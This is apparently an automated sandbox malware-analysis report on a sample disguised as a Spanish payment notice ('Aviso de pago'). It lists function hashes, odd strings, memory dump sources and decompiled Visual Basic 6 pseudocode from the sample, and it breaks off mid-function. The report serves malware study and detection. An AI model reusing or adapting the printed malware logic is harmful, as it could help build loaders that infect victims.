Instruction Fuzzy Hash: F5B01220384202FAE2148EAC5C8183039E4E3047CA3B00C33F810E11E2CAFCEF40412D

Uniqueness

Uniqueness Score: -1.00%

Function 00403A9C, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e61edd045de10250701219d8f225f72ea21dee46ff59c3aefc00e8b88843771
Instruction ID: 0b4a01471e5c541172138a860d625d771c3a42a8322ad266946492fbd0d77bc5
Opcode Fuzzy Hash: 7e61edd045de10250701219d8f225f72ea21dee46ff59c3aefc00e8b88843771
Instruction Fuzzy Hash: 5FB01220388102FAE618CBE54D8142525C496043C13200C37FC80E11D0C7FCCE00CA2D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02234ACC, Relevance: 10.0, Strings: 7, Instructions: 1213COMMON

Download Yara Rule

Strings

1<}, xrefs: 0222B2FE
@sa, xrefs: 022299D8
z.<8, xrefs: 0222C69F
|^$Z, xrefs: 0222AF14
9]G, xrefs: 02235688
&Q, xrefs: 0223555C
wd, xrefs: 0222A2A8

Memory Dump Source

Source File: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_Confirming - Aviso de pago.jbxd

Yara matches

Similarity

API ID:
String ID: 1<}$9]G$@sa$z.<8$|^$Z$wd$&Q
API String ID: 0-1921962298
Opcode ID: 0da99f1189387dedafaa677e93175cf1dd0f2290db75acf3431271044d055437
Instruction ID: 224d206b408ed2d956b42ba623649ed8289098be56dbc1446e2b7d5328cec024
Opcode Fuzzy Hash: 0da99f1189387dedafaa677e93175cf1dd0f2290db75acf3431271044d055437
Instruction Fuzzy Hash: 05B22FB16183859FCB75CF78CC987EA7BA2BF55310F49811EDC898B259C3708A85CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0222E224, Relevance: 2.8, Strings: 2, Instructions: 285COMMON

Download Yara Rule

Strings

z.<8, xrefs: 0222C69F
GL, xrefs: 0222EB5A

Memory Dump Source

Source File: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_Confirming - Aviso de pago.jbxd

Yara matches

Similarity

API ID:
String ID: GL$z.<8
API String ID: 0-4219527303
Opcode ID: a6a13e533df8ea50b96ac794a3d0852f66dee8c87f71f5f3cb0f00bcccc994ba
Instruction ID: c01dfc0e4017fb6a0f31afcf2a2d1caaec9bb5e7cb271dcbb067033ba5f4f2d1
Opcode Fuzzy Hash: a6a13e533df8ea50b96ac794a3d0852f66dee8c87f71f5f3cb0f00bcccc994ba
Instruction Fuzzy Hash: E4C11171610389DFCF748E65CD84BEA37A6BF89340F86812ADD0D9B218D7315A4ADF11

Uniqueness

Uniqueness Score: -1.00%

Function 0222D427, Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

Y?tg, xrefs: 0222D594

Memory Dump Source

Source File: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_Confirming - Aviso de pago.jbxd

Yara matches

Similarity

API ID:
String ID: Y?tg
API String ID: 0-552826256
Opcode ID: 06c345838f4f5a64f65a8d8ae1c3f45460c7d642f96d464661a138f6888c3a95
Instruction ID: 2affd3b630f70eac4b3619e08a855921e22000a8bf08546d3ef4b393e14ed3eb
Opcode Fuzzy Hash: 06c345838f4f5a64f65a8d8ae1c3f45460c7d642f96d464661a138f6888c3a95
Instruction Fuzzy Hash: A23111B1A042889BDB38DF95DC54BEE37A3AFD8700F51812EAC0D9B318D3709A01CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02228FA3, Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

Uta), xrefs: 022291E8

Memory Dump Source

Source File: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_Confirming - Aviso de pago.jbxd

Yara matches

Similarity

API ID:
String ID: Uta)
API String ID: 0-2956665482
Opcode ID: df7f2f7f155bc207da3a6b942c5d43e485f7de5d7c81783364add77e725e676c
Instruction ID: bd73dabde806ff05d456ddb65d2183c1dc2caf9b78cfc0177906c5f4b0ceaf9f
Opcode Fuzzy Hash: df7f2f7f155bc207da3a6b942c5d43e485f7de5d7c81783364add77e725e676c
Instruction Fuzzy Hash: F831E2715097949BDF71CFB88894BC67BA1AF02324F88839DCC984E2DBE3724146C781

Uniqueness

Uniqueness Score: -1.00%

Function 02233034, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_Confirming - Aviso de pago.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0185a5d38a6c33849b78c707a120cff928c8ec03a4abc0b36e80f466045c0a9d
Instruction ID: ab51668ea72014253064f0f33579e2d3c6c9b5dd9279433ae434656264a6b9ee
Opcode Fuzzy Hash: 0185a5d38a6c33849b78c707a120cff928c8ec03a4abc0b36e80f466045c0a9d
Instruction Fuzzy Hash: 161129B0A65386DFDB2ACF44C890BDA73A2BF89704F0581A9DD498B326C335DA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0222CA40, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_Confirming - Aviso de pago.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842868c7e2bbf5ee8b67a058664aa2e60b9b547dbcb905221a95747246769b73
Instruction ID: a6a358b94b198463565e6777adcb52da90ef3865b88bd03316034a1ca0802eb3
Opcode Fuzzy Hash: 842868c7e2bbf5ee8b67a058664aa2e60b9b547dbcb905221a95747246769b73
Instruction Fuzzy Hash: FDC02B0303D1332C4F721D78374C07E1C031982530B434B533044A650CEC838F4C0456

Uniqueness

Uniqueness Score: -1.00%

Function 0222C67F, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_Confirming - Aviso de pago.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dbcc30459c0819325eda94857f3020af25d741e1baa73353477f53bbda8074a
Instruction ID: d27687ea98608b84906c06963e24c571dc93c01cdac3eb1f20ee2eb64df2a06c
Opcode Fuzzy Hash: 7dbcc30459c0819325eda94857f3020af25d741e1baa73353477f53bbda8074a
Instruction Fuzzy Hash: 29B092BB2415808FEB01CB08C891B0073A4FB00648FC40490E402CF712C228ED00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 02232727, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1192983294.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_Confirming - Aviso de pago.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0041F81D, Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E0041F81D(void* __ebx, void* __edi, void* __esi, void* _a24, signed int* _a28) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				char _v64;
				char _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
				char* _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				void* _v128;
				signed int _v132;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int* _t187;
				short _t190;
				char* _t193;
				char* _t198;
				signed int _t202;
				signed int _t203;
				char* _t207;
				signed int _t211;
				signed int _t224;
				signed int _t229;
				char* _t234;
				signed int _t238;
				signed int _t247;
				signed int _t252;
				void* _t301;
				intOrPtr _t302;
				intOrPtr _t322;

				_t302 = _t301 - 0xc;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t302;
				L00401350();
				_v16 = _t302;
				_v12 = 0x401298;
				L004014E2();
				_t187 = _a28;
				 *_t187 =  *_t187 & 0x00000000;
				_t322 =  *0x401294;
				asm("fcomp dword [0x401290]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t187 < 0) {
					_v76 = 0x80020004;
					_v84 = 0xa;
					_push( &_v84);
					L0040148E();
					_v32 = _t322;
					L0040157E();
					if( *0x4223fc != 0) {
						_v160 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c70);
						L00401578();
						_v160 = 0x4223fc;
					}
					_v120 =  *_v160;
					_t247 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v68);
					asm("fclex");
					_v124 = _t247;
					if(_v124 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c60);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v164 = _t247;
					}
					_v128 = _v68;
					_t252 =  *((intOrPtr*)( *_v128 + 0xd0))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t252;
					if(_v132 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x403c80);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v168 = _t252;
					}
					_v144 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401560();
					L0040156C();
				}
				_push( &_v84);
				L00401488();
				_v108 = L"skuddermudderets";
				_v116 = 0x8008;
				_push( &_v84);
				_t190 =  &_v116;
				_push(_t190);
				L0040158A();
				_v120 = _t190;
				L0040157E();
				if(_v120 != 0) {
					if( *0x422010 != 0) {
						_v172 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v172 = 0x422010;
					}
					_t234 =  &_v68;
					L00401566();
					_v120 = _t234;
					_t238 =  *((intOrPtr*)( *_v120 + 0x150))(_v120,  &_v60, _t234,  *((intOrPtr*)( *((intOrPtr*)( *_v172)) + 0x300))( *_v172));
					asm("fclex");
					_v124 = _t238;
					if(_v124 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x150);
						_push(0x403c90);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v176 = _t238;
					}
					_push(_v36);
					_push(L"cheve");
					L00401518();
					L00401560();
					_push(_t238);
					_push(_v60);
					L00401518();
					L00401560();
					_push( &_v60);
					_push( &_v64);
					_push(2);
					L0040151E();
					_t302 = _t302 + 0xc;
					L0040156C();
					_push(0xa9);
					L00401482();
					L00401560();
				}
				_push( &_v84);
				L00401476();
				_t193 =  &_v84;
				_push(_t193);
				L0040147C();
				_v120 =  ~(0 | _t193 < 0x00000000);
				L0040157E();
				if(_v120 != 0) {
					if( *0x422010 != 0) {
						_v180 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v180 = 0x422010;
					}
					_t207 =  &_v68;
					L00401566();
					_v120 = _t207;
					_t211 =  *((intOrPtr*)( *_v120 + 0x110))(_v120,  &_v60, _t207,  *((intOrPtr*)( *((intOrPtr*)( *_v180)) + 0x30c))( *_v180));
					asm("fclex");
					_v124 = _t211;
					if(_v124 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x403cfc);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v184 = _t211;
					}
					_v148 = _v60;
					_v60 = _v60 & 0x00000000;
					_v76 = _v148;
					_v84 = 8;
					_push(0xbf);
					_push( &_v84);
					_push( &_v100);
					L00401470();
					_push( &_v100);
					L004014DC();
					L00401560();
					L0040156C();
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L0040153C();
					if( *0x4223fc != 0) {
						_v188 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c70);
						L00401578();
						_v188 = 0x4223fc;
					}
					_v120 =  *_v188;
					_t224 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v68);
					asm("fclex");
					_v124 = _t224;
					if(_v124 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c60);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v192 = _t224;
					}
					_v128 = _v68;
					_t229 =  *((intOrPtr*)( *_v128 + 0xf8))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t229;
					if(_v132 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x403c80);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v196 = _t229;
					}
					_v152 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401560();
					L0040156C();
				}
				if( *0x422010 != 0) {
					_v200 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v200 = 0x422010;
				}
				_t198 =  &_v68;
				L00401566();
				_v120 = _t198;
				_t202 =  *((intOrPtr*)( *_v120 + 0xa0))(_v120,  &_v60, _t198,  *((intOrPtr*)( *((intOrPtr*)( *_v200)) + 0x300))( *_v200));
				asm("fclex");
				_v124 = _t202;
				if(_v124 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x403c90);
					_push(_v120);
					_push(_v124);
					L00401572();
					_v204 = _t202;
				}
				_t203 = _v60;
				_v156 = _t203;
				_v60 = _v60 & 0x00000000;
				L00401560();
				L0040156C();
				asm("wait");
				_push(0x41fdcf);
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				return _t203;
			}

0x0041f820
0x0041f823
0x0041f82e
0x0041f82f
0x0041f83b
0x0041f843
0x0041f846
0x0041f853
0x0041f858
0x0041f85b
0x0041f85e
0x0041f864
0x0041f86a
0x0041f86c
0x0041f86d
0x0041f873
0x0041f87a
0x0041f884
0x0041f885
0x0041f88a
0x0041f890
0x0041f89c
0x0041f8b9
0x0041f89e
0x0041f89e
0x0041f8a3
0x0041f8a8
0x0041f8ad
0x0041f8ad
0x0041f8cb
0x0041f8da
0x0041f8dd
0x0041f8df
0x0041f8e6
0x0041f902
0x0041f8e8
0x0041f8e8
0x0041f8ea
0x0041f8ef
0x0041f8f2
0x0041f8f5
0x0041f8fa
0x0041f8fa
0x0041f90c
0x0041f91b
0x0041f921
0x0041f923
0x0041f92a
0x0041f949
0x0041f92c
0x0041f92c
0x0041f931
0x0041f936
0x0041f939
0x0041f93c
0x0041f941
0x0041f941
0x0041f953
0x0041f959
0x0041f966
0x0041f96e
0x0041f96e
0x0041f976
0x0041f977
0x0041f97c
0x0041f983
0x0041f98d
0x0041f98e
0x0041f991
0x0041f992
0x0041f997
0x0041f99e
0x0041f9a9
0x0041f9b6
0x0041f9d3
0x0041f9b8
0x0041f9b8
0x0041f9bd
0x0041f9c2
0x0041f9c7
0x0041f9c7
0x0041f9f7
0x0041f9fb
0x0041fa00
0x0041fa0f
0x0041fa15
0x0041fa17
0x0041fa1e
0x0041fa3d
0x0041fa20
0x0041fa20
0x0041fa25
0x0041fa2a
0x0041fa2d
0x0041fa30
0x0041fa35
0x0041fa35
0x0041fa44
0x0041fa47
0x0041fa4c
0x0041fa56
0x0041fa5b
0x0041fa5c
0x0041fa5f
0x0041fa69
0x0041fa71
0x0041fa75
0x0041fa76
0x0041fa78
0x0041fa7d
0x0041fa83
0x0041fa88
0x0041fa8d
0x0041fa97
0x0041fa97
0x0041fa9f
0x0041faa0
0x0041faa5
0x0041faa8
0x0041faa9
0x0041fab8
0x0041fabf
0x0041faca
0x0041fad7
0x0041faf4
0x0041fad9
0x0041fad9
0x0041fade
0x0041fae3
0x0041fae8
0x0041fae8
0x0041fb18
0x0041fb1c
0x0041fb21
0x0041fb30
0x0041fb36
0x0041fb38
0x0041fb3f
0x0041fb5e
0x0041fb41
0x0041fb41
0x0041fb46
0x0041fb4b
0x0041fb4e
0x0041fb51
0x0041fb56
0x0041fb56
0x0041fb68
0x0041fb6e
0x0041fb78
0x0041fb7b
0x0041fb82
0x0041fb8a
0x0041fb8e
0x0041fb8f
0x0041fb97
0x0041fb98
0x0041fba2
0x0041fbaa
0x0041fbb2
0x0041fbb6
0x0041fbb7
0x0041fbb9
0x0041fbc8
0x0041fbe5
0x0041fbca
0x0041fbca
0x0041fbcf
0x0041fbd4
0x0041fbd9
0x0041fbd9
0x0041fbf7
0x0041fc06
0x0041fc09
0x0041fc0b
0x0041fc12
0x0041fc2e
0x0041fc14
0x0041fc14
0x0041fc16
0x0041fc1b
0x0041fc1e
0x0041fc21
0x0041fc26
0x0041fc26
0x0041fc38
0x0041fc47
0x0041fc4d
0x0041fc4f
0x0041fc56
0x0041fc75
0x0041fc58
0x0041fc58
0x0041fc5d
0x0041fc62
0x0041fc65
0x0041fc68
0x0041fc6d
0x0041fc6d
0x0041fc7f
0x0041fc85
0x0041fc92
0x0041fc9a
0x0041fc9a
0x0041fca6
0x0041fcc3
0x0041fca8
0x0041fca8
0x0041fcad
0x0041fcb2
0x0041fcb7
0x0041fcb7
0x0041fce7
0x0041fceb
0x0041fcf0
0x0041fcff
0x0041fd05
0x0041fd07
0x0041fd0e
0x0041fd2d
0x0041fd10
0x0041fd10
0x0041fd15
0x0041fd1a
0x0041fd1d
0x0041fd20
0x0041fd25
0x0041fd25
0x0041fd34
0x0041fd37
0x0041fd3d
0x0041fd4a
0x0041fd52
0x0041fd57
0x0041fd58
0x0041fda1
0x0041fda9
0x0041fdb1
0x0041fdb9
0x0041fdc1
0x0041fdc9
0x0041fdce

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F83B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041F853
#593.MSVBVM60(0000000A), ref: 0041F885
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F890
__vbaNew2.MSVBVM60(00403C70,004223FC,0000000A), ref: 0041F8A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000014), ref: 0041F8F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C80,000000D0), ref: 0041F93C
__vbaStrMove.MSVBVM60(00000000,?,00403C80,000000D0), ref: 0041F966
__vbaFreeObj.MSVBVM60(00000000,?,00403C80,000000D0), ref: 0041F96E
#670.MSVBVM60(?,?,?,?,?,00401356), ref: 0041F977
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041F992
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041F99E
__vbaNew2.MSVBVM60(00403270,00422010,00008008,?), ref: 0041F9C2
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F9FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000150), ref: 0041FA30
__vbaStrCat.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FA4C
__vbaStrMove.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FA56
__vbaStrCat.MSVBVM60(?,00000000,cheve,?), ref: 0041FA5F
__vbaStrMove.MSVBVM60(?,00000000,cheve,?), ref: 0041FA69
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,cheve,?), ref: 0041FA78
__vbaFreeObj.MSVBVM60(?,?,00401356), ref: 0041FA83
#525.MSVBVM60(000000A9,?,?,00401356), ref: 0041FA8D
__vbaStrMove.MSVBVM60(000000A9,?,?,00401356), ref: 0041FA97
#610.MSVBVM60(?,00008008,?), ref: 0041FAA0
#557.MSVBVM60(?,?,00008008,?), ref: 0041FAA9
__vbaFreeVar.MSVBVM60(?,?,00008008,?), ref: 0041FABF
__vbaNew2.MSVBVM60(00403270,00422010,?,?,00008008,?), ref: 0041FAE3
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FB1C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000110), ref: 0041FB51
#515.MSVBVM60(?,00000008,000000BF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FB8F
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FB98
__vbaStrMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FBA2
__vbaFreeObj.MSVBVM60(?,?,00000008,000000BF), ref: 0041FBAA
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000BF), ref: 0041FBB9
__vbaNew2.MSVBVM60(00403C70,004223FC,?,?,00401356), ref: 0041FBD4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000014), ref: 0041FC21
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C80,000000F8), ref: 0041FC68
__vbaStrMove.MSVBVM60(00000000,?,00403C80,000000F8), ref: 0041FC92
__vbaFreeObj.MSVBVM60(00000000,?,00403C80,000000F8), ref: 0041FC9A
__vbaNew2.MSVBVM60(00403270,00422010,?,?,00008008,?), ref: 0041FCB2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FCEB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000000A0), ref: 0041FD20
__vbaStrMove.MSVBVM60(00000000,?,00403C90,000000A0), ref: 0041FD4A
__vbaFreeObj.MSVBVM60(00000000,?,00403C90,000000A0), ref: 0041FD52
__vbaFreeStr.MSVBVM60(0041FDCF), ref: 0041FDA1
__vbaFreeStr.MSVBVM60(0041FDCF), ref: 0041FDA9

Strings

cheve, xrefs: 0041FA47
skuddermudderets, xrefs: 0041F97C

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$Move$CheckHresult$New2$List$#515#525#557#593#610#670ChkstkCopy
String ID: cheve$skuddermudderets
API String ID: 4055753005-3782447816
Opcode ID: c51f0bde4ebf519cdb751dff4935e42bf8a0dfd12e01f6ba554726dc9163f4f2
Instruction ID: a0bc4b62e33f63e633e77803a047078eef605e08d95caa42638c85e31f4dd0ea
Opcode Fuzzy Hash: c51f0bde4ebf519cdb751dff4935e42bf8a0dfd12e01f6ba554726dc9163f4f2
Instruction Fuzzy Hash: D8F1F671900218AFDB10EFA5DD45BDDBBB4BF04304F20417AE506BB2A1DB785A89DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004200DA, Relevance: 87.8, APIs: 41, Strings: 9, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E004200DA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				short _v44;
				short _v48;
				char _v64;
				void* _v68;
				char _v72;
				signed int _v76;
				intOrPtr _v84;
				char _v92;
				char _v108;
				char* _v132;
				char _v140;
				void* _v144;
				char _v148;
				void* _v152;
				signed int _v156;
				void* _v160;
				signed int _v164;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				signed int _v216;
				intOrPtr* _v220;
				signed int _v224;
				char* _t173;
				signed int _t177;
				short _t183;
				signed int _t187;
				short _t191;
				char* _t192;
				signed int _t196;
				char* _t204;
				signed int _t208;
				char* _t209;
				char* _t211;
				signed int _t217;
				signed int _t222;
				signed int _t229;
				signed int _t234;
				void* _t261;
				void* _t263;
				intOrPtr _t264;
				void* _t265;

				_t264 = _t263 - 0x10;
				 *[fs:0x0] = _t264;
				L00401350();
				_v20 = _t264;
				_v16 = 0x4012b8;
				_v12 = 0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t261);
				L004014E2();
				if( *0x422010 != 0) {
					_v184 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v184 = 0x422010;
				}
				_t173 =  &_v72;
				L00401566();
				_v152 = _t173;
				_t177 =  *((intOrPtr*)( *_v152 + 0x160))(_v152,  &_v76, _t173,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x30c))( *_v184));
				asm("fclex");
				_v156 = _t177;
				if(_v156 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x403cfc);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v188 = _t177;
				}
				_v180 = _v76;
				_v76 = _v76 & 0x00000000;
				_v84 = _v180;
				_v92 = 9;
				_push( &_v92);
				_push( &_v108);
				L00401452();
				_v132 = L"DADAP";
				_v140 = 0x8008;
				_push( &_v108);
				_t183 =  &_v140;
				_push(_t183);
				L00401458();
				_v160 = _t183;
				L0040156C();
				_push( &_v108);
				_push( &_v92);
				_push(2);
				L0040153C();
				_t265 = _t264 + 0xc;
				if(_v160 != 0) {
					_push(0);
					L004014E8();
					_push( &_v64);
					_push(_a4);
					_push(0x403d50);
					L0040150C();
					_t265 = _t265 + 0xc;
				}
				_v84 = 0x3830;
				_v92 = 2;
				_t187 =  &_v92;
				_push(_t187);
				L00401446();
				L00401560();
				_push(_t187);
				_push(L"Rerefief");
				L0040144C();
				asm("sbb eax, eax");
				_v152 =  ~( ~_t187 + 1);
				L00401554();
				L0040157E();
				_t191 = _v152;
				if(_t191 != 0) {
					if( *0x4223fc != 0) {
						_v192 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c70);
						L00401578();
						_v192 = 0x4223fc;
					}
					_v152 =  *_v192;
					_t229 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v72);
					asm("fclex");
					_v156 = _t229;
					if(_v156 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c60);
						_push(_v152);
						_push(_v156);
						L00401572();
						_v196 = _t229;
					}
					_v160 = _v72;
					_t234 =  *((intOrPtr*)( *_v160 + 0xc8))(_v160,  &_v144);
					asm("fclex");
					_v164 = _t234;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x403c80);
						_push(_v160);
						_push(_v164);
						L00401572();
						_v200 = _t234;
					}
					_t191 = _v144;
					_v44 = _t191;
					L0040156C();
					_push(L"HOLLO");
					_push(L"Regular6");
					_push(L"Azulmic");
					_push(L"bedrageriets");
					L004014B2();
				}
				L00401440();
				_t192 =  &_v72;
				L00401566();
				_v152 = _t192;
				_t196 =  *((intOrPtr*)( *_v152 + 0x1c))(_v152,  &_v148, _t192, _t191);
				asm("fclex");
				_v156 = _t196;
				if(_v156 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x403fe8);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v204 = _t196;
				}
				_v160 =  ~(0 | _v148 - 0x007560d5 >= 0x00000000);
				L0040156C();
				if(_v160 != 0) {
					_push(L"bopl");
					_push(L"Verdantly");
					L00401518();
					L00401560();
					if( *0x4223fc != 0) {
						_v208 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c70);
						L00401578();
						_v208 = 0x4223fc;
					}
					_v152 =  *_v208;
					_t217 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v72);
					asm("fclex");
					_v156 = _t217;
					if(_v156 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c60);
						_push(_v152);
						_push(_v156);
						L00401572();
						_v212 = _t217;
					}
					_v160 = _v72;
